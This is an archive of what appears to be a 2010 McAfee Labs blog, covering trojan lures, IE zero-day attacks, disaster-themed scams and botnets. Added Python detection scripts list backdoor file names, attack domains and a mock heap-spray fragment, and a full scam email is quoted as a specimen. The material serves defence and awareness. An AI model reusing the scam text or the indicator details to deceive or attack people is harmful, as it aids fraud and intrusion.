Archive for the 'Web and Internet Safety' Category

Malicious Web Attack Using Executable With facebook.com in Name

While working through URLs flagged as suspicious by our GTI technology, one that stood out was an ordinary “.com” site that loaded a PHP script. As we processed it, we saw that the PHP script reached out to download a file whose name ended in the string facebook.com.exe. Because the site was very social-network friendly, it is easy to see how an average user without web protection in place would not realize what was going on. The lure depends on the trailing extension being overlooked: with the default Windows setting that hides known file extensions, the file is displayed simply as facebook.com.

And what was this *facebook.com.exe? The McAfee Web Gateway engine detected it immediately as: McAfee-GW-Edition 6.8.5 2010.03.10 Trojan.Injector.Awi.88

File Download Security Warning

FileInsight View

As I write this, the sample is already showing broader visibility in our Artemis telemetry, and we are making sure that all of our products protect against this threat.

Artemis Map of Outbreak

The server hosting this file has already been taken offline. However, this technique and this piece of malware will continue to be seen again, and again, and again. In fact, we have already found other web servers hosting the same attack along the same lines, and we will continue to monitor and follow it.

McAfee Labs Publishes ‘March Spam Report’

McAfee Labs today published its March Spam Report.

This month authors Adam Wosotowsky and Elan Winkler discuss a possible charity scam in France that takes advantage of sympathy for the victims of the Haitian earthquake, examine a “ham campaign” regarding events in Haiti, and look at another fraudulent attempt to connect “lonely women” with victims’ credit cards.

Our key topics:

  • Security professionals working together can expose fraudsters and sometimes bring about their arrests. One of our French researchers shows how it can work.
  • The disaster in Haiti was, as usual, a spark for spammers, but it also caused a significant amount of legitimate “ham” email.
  • Spammers based primarily in China are keeping busy sending out scams offering Russian “brides” for sale.

For this report and others, many available in up to eight languages besides English, visit our Threat Center Technical White Papers page.

Chilean Earthquake Spawns Malware

Most of us are familiar with how high-profile news events are used for malware distribution. We have seen it many times, such as with the Tiger Woods scandal and the earthquake in Haiti. Now the recent earthquake in Chile is being used to prey on people looking for news about the quake and the tsunami that followed. This shows we should be careful about where we go for information. Try any search term or phrase related to “Chile Earthquake”, “Tsunami”, etc. I did so and will walk through a few examples of risky to malicious content that my search turned up.

This type of malware distribution tends to target the broadest audience possible, so I entered the search term “Chile” and let Google auto-complete it to “Chile quake 2010 tsunami”, a popular search phrase. Almost immediately, among some recognizable news site results, were random blog posts touting words like “download” or “.exe”. We should be suspicious of these.

The first few I tested were not surprising: standard-looking blog posts with YouTube videos. But when I clicked the YouTube videos, YouTube had already removed them for violating its terms. This was likely malicious content that had fortunately been discovered already. Here are a couple of examples, one with the video still embedded in the blog page, and the other directly from YouTube.

Malicious YouTube video pulled

Malicious YouTube video pulled 2

I found about three of these right off the bat. But then came something more disturbing, and much more dangerous: Google’s Safe Browsing warned that the next site had already been identified as malicious.

Google Safebrowse

I didn’t continue further down that path, but kept looking at more of the search results. I next clicked what appeared to be a safe domain with terms about a princess apple, but what would a site like that have to do with Chilean earthquakes? I was suspicious, and immediately found out why. A pop-up message that we should all learn to recognize opened without my action or approval. This is commonly referred to as rogue AV: malware disguised to look like an anti-malware security scan. These are very dangerous. Typically your best bet for getting out is to press Ctrl+Alt+Delete, open Task Manager, and kill your browser process; otherwise the rogue AV will attempt to download its malicious payload. Don’t bother clicking Cancel or trying to close your browser with the red X. Here’s a snapshot. Notice that it mimics a legitimate Windows Security alert and reports that your machine is infected with various Trojans and malware.

Fake AV malware pop up

I clicked one more blog, again looking like a fairly legitimate post with what I assumed was a YouTube video, possibly pulled by YouTube like the previous examples. Instead, my anti-virus software detected a hidden IFRAME pointing to (modified for safety): ‘http://www.xxxxxx.xxxx/navbar.g?targetBlogID=78306394491143XXXXX&blogName=Auto+Loan+Insurance&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=LAYOUTS&searchRoot=http%3A%2F%2Fxxxxxxx.blogspot.com%2Fsearch&blogLocale=en&homepageUrl=http%3A%2F%2Fxxxxxxxxx.blogspot.com%2F’.

Malicious video blog post
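To make that last observation concrete, here is an added example (not code from the original post) that scans a page’s HTML for iframes kept out of sight, either by inline style or by zero- or one-pixel dimensions, which is how an injected frame is usually hidden. The sample page is constructed; the frame URLs reuse the masking the post applies, and the hiding heuristics are an assumption rather than an exhaustive list.

```python
"""Find <iframe> elements a page keeps out of sight.

Added example; the sample page below is constructed and the hiding
heuristics are an assumption, not an exhaustive list."""
import re
from html.parser import HTMLParser

# Inline CSS that makes an element invisible without removing it.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _tiny(value):
    """True if a width/height attribute is 0 or 1 (bare number or px)."""
    try:
        return int(value.strip().lower().rstrip("px")) <= 1
    except ValueError:
        return False


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are hidden by style, size, or attribute."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("style hides the frame")
        if _tiny(a.get("width", "")) or _tiny(a.get("height", "")):
            reasons.append("zero- or one-pixel dimensions")
        if "hidden" in a:
            reasons.append("hidden attribute")
        if reasons:
            self.hits.append({"src": a.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of {'src', 'reasons'} for every hidden iframe in html."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed sample: a visible video embed, then two hidden frames. The
# navbar URL is the one from the post, with the author's masking kept.
SAMPLE_PAGE = """
<html><body>
<h1>Chile quake 2010 tsunami video</h1>
<iframe width="425" height="344" src="http://www.youtube.com/v/XXXXXXXXXXX"></iframe>
<iframe src="http://www.xxxxxx.xxxx/navbar.g?targetBlogID=78306394491143XXXXX&amp;blogName=Auto+Loan+Insurance"
        style="display:none" width="1" height="1"></iframe>
<iframe src="http://xxxxxxxxx.blogspot.com/" width="0" height="0" frameborder="0"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(hit["src"], "->", "; ".join(hit["reasons"]))
```

Run against a saved copy of a suspect page, the script lists each hidden frame with the reason it was flagged; a visible embed with normal dimensions, like the first iframe in the sample, is left alone.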

This should serve as a good reminder to be cautious when looking for information. Not only should you beware of where you get information; consider the examples above and ask yourself whether a site looks like a legitimate place to get such information, and why such a site would turn up in search results for the topic at all. Remember that YouTube videos posted on blogs can easily be spoofed and may not be what you expect. For high-profile news topics such as the recent earthquake in Chile, go to news sites you trust rather than letting a random search take you to the information. In addition to developing wise surfing habits, McAfee offers tools such as SiteAdvisor, which reports how safe or risky a site may be before you click on it from your search results.

Targeted Internet Explorer Zero-Day Attack Announced (CVE-2010-0806)

Earlier today, Microsoft released Security Advisory (981374). This advisory covers CVE-2010-0806, an unpatched vulnerability affecting Internet Explorer versions 6 and 7. The attack appears to be rather targeted at the moment, but as with other unpatched vulnerabilities in the past, it has the potential to explode now that word is getting out.

McAfee Labs is aware of an attack emanating from the domain topix21century.com (over both http and https). In this attack, vulnerable users are directed to a malicious webpage that downloads and executes a file named notes.exe or svohost.exe (the latter a look-alike of the legitimate svchost.exe; both classified as BackDoor-EMN) in drive-by download fashion: visiting the page is enough to get infected. Multiple variants of this trojan are involved. Notes.exe creates two copies of itself in the %temp% directory and drops a DLL file. This DLL is injected into Internet Explorer and provides remote access to an attacker.

The backdoor allows an attacker to perform various functions on the compromised system, including uploading & downloading files, executing files, and terminating running processes. Infected systems may attempt to communicate with the domain notes.topix21century.com over https.

File names related to this attack include:

  • 20100307.htm (CVE-2010-0806 exploit)
  • bypasskav.txt (part of exploit obfuscation code)
    • notes.exe (backdoor installer)
      • note.exe (backdoor installer copy)
      • clipsvc.exe (backdoor installer copy)
        • wshipl.dll (backdoor)
      • rsvm.exe (backdoor installer)
        • wshipnotes.dll (backdoor)
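As an added triage aid (not part of the original advisory), the following script sweeps a Windows file listing and proxy log lines for the artifacts named above. The paths and log lines are constructed samples, the Squid-style log layout is an assumption, and matching on file names alone is weak because the post gives no hashes, so treat a hit as a lead rather than a verdict.

```python
"""Sweep a file listing and proxy log lines for the CVE-2010-0806 artifacts
named in the post above.

Added example; the paths and log lines are constructed, the Squid-style
log layout is an assumption, and file-name matching is a lead, not a verdict."""
import re
from pathlib import PureWindowsPath

# File names from the post. svohost.exe imitates the legitimate svchost.exe,
# so the real system binary must not match.
FILE_IOCS = {
    "20100307.htm", "bypasskav.txt", "notes.exe", "svohost.exe", "note.exe",
    "clipsvc.exe", "wshipl.dll", "rsvm.exe", "wshipnotes.dll",
}
# Attack and C2 domain from the post; any host under it counts.
DOMAIN_IOC = "topix21century.com"
HOST_RE = re.compile(
    r"\b[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+\b", re.I)


def in_ioc_domain(host):
    """True for the domain itself or any label beneath it, never a look-alike."""
    host = host.lower().rstrip(".")
    return host == DOMAIN_IOC or host.endswith("." + DOMAIN_IOC)


def match_file_iocs(paths):
    """Return the paths whose file name (case-insensitive) is a listed IOC."""
    return [p for p in paths if PureWindowsPath(p).name.lower() in FILE_IOCS]


def match_network_iocs(lines):
    """Return (line_number, host) for every log line touching the IOC domain.

    Scheme-agnostic: the post notes the site was served over http and https,
    so CONNECT entries to :443 are matched as well as plain GETs."""
    hits = []
    for n, line in enumerate(lines, 1):
        for host in HOST_RE.findall(line):
            if in_ioc_domain(host):
                hits.append((n, host.lower()))
    return hits


# Constructed %temp% listing: three dropped names, one legitimate svchost.exe.
SAMPLE_PATHS = [
    r"C:\Windows\System32\svchost.exe",
    r"C:\Documents and Settings\alice\Local Settings\Temp\note.exe",
    r"C:\Documents and Settings\alice\Local Settings\Temp\clipsvc.exe",
    r"C:\Documents and Settings\alice\Local Settings\Temp\wshipl.dll",
    r"C:\Documents and Settings\alice\My Documents\notes.txt",
]

# Constructed Squid-style access log: exploit page, C2 over https, a benign
# request, and a look-alike domain that must not match.
SAMPLE_LOG = [
    "1268179200.123 412 10.0.0.5 TCP_MISS/200 5120 GET http://topix21century.com/20100307.htm - DIRECT/198.51.100.7 text/html",
    "1268179201.456 88 10.0.0.5 TCP_MISS/200 0 CONNECT notes.topix21century.com:443 - DIRECT/198.51.100.7 -",
    "1268179202.789 30 10.0.0.6 TCP_HIT/200 2048 GET http://www.example.com/index.html - NONE/- text/html",
    "1268179203.000 30 10.0.0.7 TCP_MISS/200 100 GET http://nottopix21century.com/ - DIRECT/203.0.113.9 text/html",
]

if __name__ == "__main__":
    for p in match_file_iocs(SAMPLE_PATHS):
        print("file IOC:", p)
    for n, host in match_network_iocs(SAMPLE_LOG):
        print(f"network IOC on line {n}: {host}")
```

The domain check deliberately requires the indicator to be the whole host or a suffix preceded by a dot, so a registered look-alike such as the constructed nottopix21century.com does not produce a false hit.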

Preliminary product coverage is as follows:

  • McAfee DAT files (antivirus): Coverage will be provided for known exploits as Exploit-CVE-2010-0806 and known payloads as BackDoor-EMN in the 5916 DAT files, releasing March 10.
  • McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover future exploits.
  • McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover future exploits.
  • McAfee Network Security Platform: The sigset releasing March 9 contains coverage under the signature “HTTP: Microsoft Internet Explorer Code Execution Vulnerability”.
  • McAfee Vulnerability Manager: The FSL/MVM package of March 9 includes a vulnerability check to assess if your systems are at risk.
  • McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts.
  • McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts.
  • McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

McAfee Labs is investigating this attack further and will continue to monitor any related activity closely.

Apple Announces iPad Availability: Watch Out for Scams!

Last week Apple formally announced the launch date for the Wi-Fi version of its much-anticipated new tablet computer, the iPad. As with most events that generate a lot of media and consumer interest, this one also drew the attention of spammers, who wonder how they can leverage the event to steal your sensitive information.

Scams have already started to surface, claiming that you can win your own iPad for free. All you need to do is provide your address for shipment, and … oh, yes, to get your “free” iPad you also need to purchase something, which requires you to hand over your credit card details. There had to be a catch somewhere.

Here is an example of such an email:

This is basically your typical “free offer” scam, but given the popularity and buzz surrounding any Apple product announcement, it is essential to separate the legitimate from the “too good to be true.” As the release date for the iPad approaches, more scams like this are likely to emerge, delivered through email, social media, and common search engine terms.

Keep your eyes open, be diligent, and if you question whether any kind of offer you receive in email or on the web is legitimate, you should follow your instincts. Such offers are likely to be bogus.

Wiseguys Botnet First in Line for Concert, Sports Tickets

We frequently read stories about spammers who circumvent CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) checks. Using bot-infected machines, they can create a vast number of random e-mail accounts for spamming purposes.

This week, a federal judge in Newark, New Jersey, revealed the latest use of a botnet-like network with a CAPTCHA breaker. In this case, the computers overseen by the defendants were used to buy seats for high-profile concerts and sports events from ticket sellers’ websites. The defendants then allegedly resold the tickets on the Internet at much higher prices.

According to the indictment, the distributed software was developed by programmer accomplices in Bulgaria. The application defeated security measures designed to limit individual ticket purchases and snatched up the best seats. Unlike the botnets we frequently encounter, this one ran on dedicated computers set up solely for this purpose. The botnet purchased more than 1.5 million premium tickets to events from late 2002 to about January 2009, making an estimated profit of $28.9 million.

The employees, contractors, and defendants behind this rip-off are known as the “Wiseguys,” based on the name of the Nevada corporation they created (Wiseguy Tickets, Inc.). The Wiseguys botnet was a nationwide network of computers used to purchase thousands of tickets within minutes. The botnet:

  • Monitored the online ticket vendors’ websites for the exact moment that tickets to popular events went on sale
  • Opened thousands of connections at the instant that tickets went on sale
  • Defeated the CAPTCHA challenge in a fraction of a second (a human needs five to ten seconds), thus speeding ahead of legitimate buyers
  • Supervised by Wiseguys employees, prepared lists of hundreds of the best tickets almost instantly
  • Filled in all the fields necessary to complete the purchases, including customer credit card information and false e-mail addresses

The indictment explains how the Wiseguys took advantage of many popular events, such as the BCS college football championship game, the Barbra Streisand concert in Chicago, Hannah Montana concerts in New Jersey, and the 2008 Bruce Springsteen tour. For this last event alone, the botnet purchased approximately 11,800 tickets.

One of their last crimes occurred in January 2009, according to the indictment, when the botnet impersonated 1,000 individual ticket buyers for the New York Giants vs. Philadelphia Eagles NFL playoff game at Giants Stadium in East Rutherford, New Jersey.

This affair is a perfect example of a targeted attack (here against the online ticket vendors) using malware that is not widespread. It demonstrates how important it is for administrators to keep watch over their networks and look for even the slightest anomalies.

Check out this video for CNN’s coverage.

On Olympics, St. Patrick’s Day, Screensavers, and Wallpaper

The combination of search engine optimization with sporting and holiday news continues to fascinate me. Oh, and did I mention malware and malicious websites? They always make for interesting bedfellows.

The Olympics have been getting massive coverage, of course, and St. Patrick’s Day is just around the corner. We can count on these events to provide cybercriminals with plenty of search engine manipulation possibilities and social engineering lures.

I ran a few basic Google searches and got pretty much what I expected: malicious sites and malware links. Starting with some basic Olympics-based searches, first for Olympic Games Wallpaper:

Malicious Olympic Wallpaper Search

For this search three of the top five results led to malicious links (not good). The next search moved on to Olympics-themed screensavers (which historically are heavily abused):

Malicious Olympic Screensavers

In this case two of the 10 results on the first page led to malicious websites, actually fewer than I expected. But look what happened when I added the word download to my search:

Malicious Olympic Screensaver Download Search

In this case five of the 10 results on the first page were malicious or questionable. Quite interesting. When I added an -s to download, my results “improved” to six malicious entries!

Next I moved on to the theme of St. Patrick’s Day for wallpaper and screensavers. Lo and behold, just about the same types of results:

St Patrick's Day Wallpaper Search

Just shy of half the results on the first page for wallpaper led to some very nasty sites indeed. Next I searched for themed screensavers:

St Patrick's Day Screensaver Search

Again, just about half the results on the first page led to malicious links. That’s not surprising, but it certainly isn’t good. Remember this trend: news, sporting events, and holidays are common lures for cybercriminals. Be suspicious when searching for information in any of these areas (and in many others). Safe-searching technologies such as SiteAdvisor are more important than ever.

Today’s cybercriminal is smart and prepared. Let’s all be smarter and better prepared.

McAfee Labs Quarterly Threat Report Posted

Today we unveiled our Threats Report for the fourth quarter of 2009. It highlights many of the most significant spam stories of 2009 as well as the rise of political hacktivism in countries such as Poland, Latvia, Denmark, and Switzerland. The report also finds that 2009 averaged approximately 135.5 billion spam messages per day, yet spam volume decreased by 24 percent in Q4 compared with Q3.

Spammers piggybacked heavily on leading headlines in 2009, taking advantage of breaking news stories, global tragedies, and other timely events. The Air France plane crash and Michael Jackson’s death were among the top tragedies exploited by spammers last year. McAfee researchers also noted a significant number of 2010 FIFA World Cup-themed phishing scams, Zeus Trojans masquerading as CDC notices about the H1N1 vaccine program, and “get rich quick” scams driven by rising U.S. unemployment.

Politically motivated attacks are on the rise around the world, targeting popular social networking destinations, as seen recently with the Iranian Cyber Army’s political attack aimed at Twitter. The report confirms that the United States is not the sole target, nor is China the sole origin for these types of assaults. Recent political attacks targeted the Polish government, the Copenhagen Climate Conference, and Latvia’s Independence Day.

Malware, including fake security software, attacks on social networks, and AutoRun USB infections, continued to rise significantly last year. Internet-based, Web 2.0-centric attacks and threats on portable storage devices played a huge role in 2009, contributing greatly to the immense increase in threats and demonstrating how the nature of computer threats is evolving over time. Cybercriminals used social networking sites to target a new generation of victims, with Koobface activity increasing considerably during the latter part of 2009. Koobface is now hosted on servers in 46 countries, with the United States, Germany, and Denmark the top three hosting locations.

China Overtakes the U.S. as No. 1 Country Producing Zombies

Zombie production in the U.S. dropped significantly, from 13.1 percent in Q3 to 9.5 percent in Q4, making China the top Zombie-producing country at 12 percent. Brazil ranked third, with Russia and Germany rounding out the top five countries. The United States still remains the number one country in spam production, with Brazil and India taking the number two and three spots. Ukraine and Germany joined the list of top 10 countries producing spam for the first time in 2009.

The Geographic Distribution of Web Threats

North America is the worldwide leader in hosting malicious content, with Europe/Middle East/Africa second, followed by Asia/Pacific. In Europe, Germany holds the number one spot, followed by the Netherlands and Italy. China is the chief host for malicious content in Asia, followed by Russia and South Korea. South America is beginning to play a larger role, with Brazil as the top hosting country in that region.

China is the Worldwide Leader in SQL-Injection Attacks

Although SQL-injection attacks originate from a number of countries across the globe, China was by far the number one country hosting these assaults, at 54.4 percent. Separately, due to the growing popularity of Adobe applications, McAfee Labs saw a number of client-side attack attempts exploiting Flash and Acrobat Reader.

A full copy of the Q4 2009 Threats Report is available here.

Hackers Disrupt European CO₂ Market

In recent weeks, various cybercrime attacks have disrupted the computer systems that allow nations to manage their national greenhouse-gas emissions quotas and their holdings of carbon assets under international agreements (the Kyoto Protocol and the European trading system). One quota is the right to emit the equivalent of one ton of carbon dioxide during a specified period.

The initial attack targeted the Danish CO₂ quota registry, which was shut down on January 12. The Danish authorities took this step after registry users received a fake email purporting to come from the Danish Energy Agency and redirecting recipients to a look-alike site that stole their credentials.

It seems the attackers renewed their attempt last week by sending similar emails to carbon financial services in 13 European countries. Here, too, the goal was the theft of usernames and passwords to gain access to the national CO₂ quotas management systems. This caused another quota-market closure.

Using these credentials, the attackers, rather than manufacturers, governments, and brokers, would in theory be able to sell and buy quotas. During the past 18 months, fraud on the CO₂ market has caused a tax loss of €5 billion. Such access would also be useful to the biggest emitters of carbon dioxide; those parties could manipulate the international quotas to reduce their penalties. The following graphic, from Europol (the European law enforcement agency), explains how such fraud can occur.

One thing is sure: the people behind these attacks are not simple hackers. They are likely in the pay of rogue states that reject rules-based international trade.

Scams Take Advantage of Haiti Relief Efforts

Never is the heartless nature of cybercriminals more apparent than in the wake of a tragedy. As relief efforts continue and worldwide aid pours in to help those affected by the earthquake that rocked Haiti on January 12, cybercriminals have not slowed their efforts. They are eager to get you to donate money that the people of Haiti will never see. Spoofing legitimate relief organizations such as the Red Cross is a typical social engineering lure the bad guys use to take your money. This morning, however, a particular scam caught my eye that I wanted to share with you. Its subject line was “Help for Haiti” and it was sent by “b.obama@whitehouse.gov.” Mr. “b.obama” writes:

President Barack Obama

On Tuesday, a catastrophic earthquake struck near Port-au-Prince, Haiti. The full extent of the damage is still being assessed, but the death toll — already in the thousands — is climbing fast.

This is the worst earthquake to hit the area in more than 200 years. Entire communities have been ripped apart and as many as 3 million people have been directly affected, including tens of thousands of American citizens who are in Haiti.

Our neighbors in Haiti are racing to confront the enormous devastation — and the OFA community can help.

Read down for more information about essential relief efforts and ways you can help today.

Footage is pouring in of homes collapsing, Haitians carrying injured family members, and hospitals being overrun in what was already the poorest nation in the Western Hemisphere.

I have directed my administration to respond with a swift, coordinated, and aggressive effort to save lives. Personnel from the United States and our partners in the international community are on the ground in damaged areas right now, working side by side with the Haitian people. They’re providing much-needed food, water, and sanitation supplies, saving lives and helping local communities start to rebuild.

Despite the fact that we are experiencing tough times here at home, I encourage those who can to reach out and help. It’s in times like these that we must show the kind of compassion and humanity that has defined the best of our national character for generations.

Read here to find out what you can do:

Obama In The United Kingdom

Help Haiti

Western Union Details

Name: XXXXXXXX

Country: United Kingdom

Call us On +XXXXXXXXXX
Any Funds given to the good people of America Here in The UK will be shared amongs Red Cross and all relief agencies.No amount is too small.

As this story continues to unfold, I hope you will continue to keep the people of Haiti in your thoughts and prayers, as well as the many Haitian-Americans who have done so much to enrich our country and who are worried about friends and loved ones in this time of need.

Thank you,

President Barack Obama

I’ve censored some of the contact information so that nobody visiting this blog will attempt to send money to the people responsible for this scam. I cannot emphasize enough that you must perform due diligence before donating to any charity. Ensure that the money you donate is going to the cause that you choose.

A couple of things to remember:

  • Don’t respond to emails requesting donations, credit card information, or other sensitive information that you do not feel comfortable giving
  • Don’t click links within email that direct to donation websites, as they may be directing you to a malicious website under the covers
  • Don’t open attachments with donation forms, as they may be executable malware
  • Work directly with charity organizations that you know and trust

Cybercriminals prey on the emotions of their victims. That’s why social engineering tactics such as these are successful. However, if you do your homework first, follow safe email and web-browsing habits, and work closely only with reputable charities to donate money, you can feel more comfortable that your sensitive information won’t end up in the wrong hands.

Patch Released for Recent Microsoft Zero Day (CVE-2010-0249)

Microsoft has released Security Bulletin MS10-002, addressing Internet Explorer vulnerabilities. In addition to patching the flaw exposed by Operation Aurora, the company patched seven other vulnerabilities.

We are aware of reports of private CVE-2010-0249 exploits affecting Internet Explorer 7 and 8 (though these are mitigated by ASLR and DEP). Historically, the odds of private exploits being made public rise dramatically after a patch is released.

In my last post, I mentioned that many detections were occurring on systems in China. The number of detections in the United States today is closing that gap.

This is not a patch to put on the back burner.

Update on Recent Microsoft 0day (CVE-2010-0249)

Here’s a quick update on CVE-2010-0249, aka the Aurora exploit. A few days ago exploit code was made public. Since then malware authors have been customizing the exploit’s payload to install their own malicious creations. Much of the field telemetry we have received comes from McAfee users in China visiting websites in China. Some users have been directed to malicious sites from blog and forum posts, while other cases involve compromised web pages that use multiple JavaScripts and iframes to pull in the malicious content.

The exploits are often served from subdomains of 3322.org and 8866.org. A common filename is ie.html, which references what.jpg; that file contains part of the exploit code and is not a JPEG image. Some payloads download files named down.css and log.css, which are malware executables rather than stylesheets. Those executables in turn download other malware, including:

  • Artemis!629E2332CFDA – Generic PWS.y!bsk
  • Artemis!78043EBA321B – PWS-Mmorpg!la
  • Artemis!911BCF95C022 – PWS-OnlineGames.gx
  • Generic Downloader.x!coe
  • Generic Dropper!byp
  • Generic PWS.y!bsk
  • PWS-Mmorpg!la
  • Suspect-02!50CB7D4BB04E – Generic Dropper.hi
  • Suspect-26!4EBF601DCBF6 – PWS-Mmorpg!la
  • Suspect-26!6D89EB2792F7 – PWS-Mmorpg!hb
  • Suspect-26!B01B63F88994 – PWS-Mmorpg!la
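Both this post and the earlier facebook.com.exe write-up turn on a file whose name lies about its content: a double extension that buries the real .exe, or an image or stylesheet name on a PE executable or a script. The following added example (not code from either original post) checks a download for both lures. The sample byte strings are constructed stand-ins for the real files, and the extension sets are an assumption.

```python
"""Check a downloaded file for a name that lies about its content.

Added example covering two lures from the posts above: a double extension
that buries the real .exe (facebook.com.exe), and image or stylesheet names
on a PE executable or script (what.jpg, down.css, log.css). Sample bytes are
constructed stand-ins; the extension sets are an assumption."""
import re

# Extensions Windows runs directly. Note that .com is itself executable, so
# 'facebook.com' would be dangerous even without the trailing .exe.
EXEC_EXTS = {"exe", "com", "scr", "pif", "bat", "cmd", "dll"}
IMAGE_EXTS = {"jpg", "jpeg", "gif", "png"}
PE_MAGIC = b"MZ"
JPEG_MAGIC = b"\xff\xd8\xff"
GIF_MAGIC = b"GIF8"
PNG_MAGIC = b"\x89PNG"


def _ext(filename):
    return filename.lower().rsplit(".", 1)[-1] if "." in filename else ""


def lure_name(filename):
    """Reason if the name is a double-extension lure, else None.

    Windows hides known extensions by default, so 'facebook.com.exe' is shown
    as 'facebook.com'; a domain-like or document-like inner extension is
    exactly what the lure wants the victim to see."""
    parts = filename.lower().rsplit(".", 2)
    if len(parts) < 3:
        return None
    _, inner, outer = parts
    if outer in EXEC_EXTS and re.fullmatch(r"[a-z]{2,6}", inner):
        return f"double extension .{inner}.{outer}"
    return None


def content_mismatch(filename, data):
    """Reason if the first bytes contradict the extension, else None."""
    ext = _ext(filename)
    if data.startswith(PE_MAGIC) and ext not in EXEC_EXTS:
        return f"PE executable served as .{ext}"
    if ext in IMAGE_EXTS and not data.startswith((JPEG_MAGIC, GIF_MAGIC, PNG_MAGIC)):
        return f"named .{ext} but content is not an image"
    return None


def audit_download(filename, data):
    """Return the list of reasons a download should be held for review."""
    return [r for r in (lure_name(filename), content_mismatch(filename, data)) if r]


# Constructed samples modelled on the posts; none is real malware.
PE_STUB = b"MZ\x90\x00" + b"\x00" * 60
SAMPLES = {
    "facebook.com.exe": PE_STUB,                           # lure name, real PE
    "what.jpg": b"var sc = unescape('%u9090%u9090');",    # 'image' holding script
    "down.css": PE_STUB,                                   # 'stylesheet' that is a PE
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 60,       # genuine JPEG header
    "setup.exe": PE_STUB,                                  # honest executable
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name}: {audit_download(name, data) or 'ok'}")
```

The same comparison applies to a response’s Content-Type header: what.jpg would have been served as an image while carrying script, and down.css as a stylesheet while carrying a PE file, so checking the leading bytes against what the name or header claims catches both without any signature.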

Given that exploit code is readily available, this is likely only the tip of the iceberg in terms of the domains and malware we will see over the next few weeks (and we can expect new exploit and related malware variants for many months, if not years, to come).

Earlier today, Computerworld reported that private exploits had been created for Internet Explorer 7 and 8, but that those exploits would remain private. Still, this publicity may entice others to meet the challenge and go public to prove their prowess.

On the bright side, Microsoft said today that it would release an out-of-cycle patch for this vulnerability. McAfee Labs advises those tempted to install an unofficial patch to think twice before doing so, as malware and adware often arrive under the guise of such a “fix”.

Investigating a Possible Charity Scam

On Saturday, my McAfee Labs colleague Craig Schmugar wrote about phishing sites and email scams related to the recent earthquake in Haiti. The people behind these frauds deserve to be caught by the law. I have a story that demonstrates that when several researchers join forces the bad guys run the risk of being punished.

On Sunday, among the hundreds of emails I received about Operation Aurora, was one from Nick FitzGerald, a well-known anti-malware researcher. He asked for my opinion about a possible charity scam with a French origin.


Nick asked me to verify the details, an easy thing for a French speaker. After I called the mobile phone number and got an answering machine, I contacted the town hall of the place where the requester claimed his company was based. The official in charge knew neither the company nor any local initiative in favor of the Haitian people.

Two Internet searches allowed me to identify a possible sender. First, I searched on the phone number and found, in the same administrative division, an individual selling a Mercedes.


Suspecting another rip-off (you pay an advance fee and never see the car), I searched on the company name and found a business directory listing its managing director: the same name as the car seller.


Finally, just as I was preparing my response to Nick, I received a call from friends at the French banking industry’s Computer Emergency Response Team. They had made the same discoveries and were also able to point me to court rulings concerning this person: he was sentenced in 2009 for using false insurance certificates and false bank guarantees.

Yesterday I forwarded all these data to the authorities and hope that they will take appropriate steps. I cannot claim that this individual is once again breaking the law; in France we enjoy the presumption of innocence. However, this story should prompt you to be vigilant and not fall for email charity scams.

Last week the U.S. FBI released a warning on this subject. Yesterday it renewed the message with the following guidelines:

  • Do not respond to any unsolicited (spam) incoming emails, including clicking links contained within those messages
  • Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via email or social networking sites
  • Beware of organizations with copycat names similar to but not exactly the same as those of reputable charities
  • Rather than following a purported link to a website, verify the legitimacy of nonprofit organizations by using various Internet-based resources to confirm the group’s existence and its nonprofit status
  • Be cautious of emails that claim to show pictures of the disaster areas in attached files, because the files may contain viruses. Open attachments only from known senders.
  • To ensure your money is received and used for its intended purposes, make contributions directly to known organizations rather than relying on others to make the donation on your behalf
  • Do not be pressured into making contributions, as reputable charities do not use such tactics
  • Do not give your personal or financial information to anyone who solicits contributions. Providing such information may compromise your identity and make you vulnerable to identity theft.
  • Avoid cash donations if possible. Pay by debit or credit card, or write a check directly to the charity. Do not make checks payable to individuals.

I strongly agree with this advice!

McAfee ‘Hacking Exposed’ Webcast Series Fights Cybercrime

We are pleased to announce the next event in our complimentary monthly “Hacking Exposed Live!–A Webcast Series,” which teaches attendees how to protect against cybercrime and hackers. The monthly webcast, hosted by Hacking Exposed coauthor and McAfee Senior Vice President Stuart McClure, walks attendees through the latest hacking techniques and explains countermeasures for preventing attacks.

The next webcast is January 21 at 11 a.m. Pacific time (2 p.m. Eastern) and will feature two white-hot security topics: Botnets and Aurora–the zero-day vulnerability that last week struck Google and several other well-known companies. McAfee Worldwide Chief Technology Officer George Kurtz and McAfee Senior Director Greg Brown will join McClure to enlighten the audience on how hackers exploit these vulnerabilities and what can be done to prevent them from impacting businesses.

Based on the best-selling security book Hacking Exposed, this live monthly webcast gives attendees deep insights into current and evolving hacks and what they can do to keep their environments protected. The webcasts include everything attendees need to know to stay ahead of those who would cause harm. The sessions will also address the universe of hacks–involving social media, mobile, Unix, and more.

Click here to learn more and register today.

Went Looking for IE Exploits in “Haiti”, Found Something Else

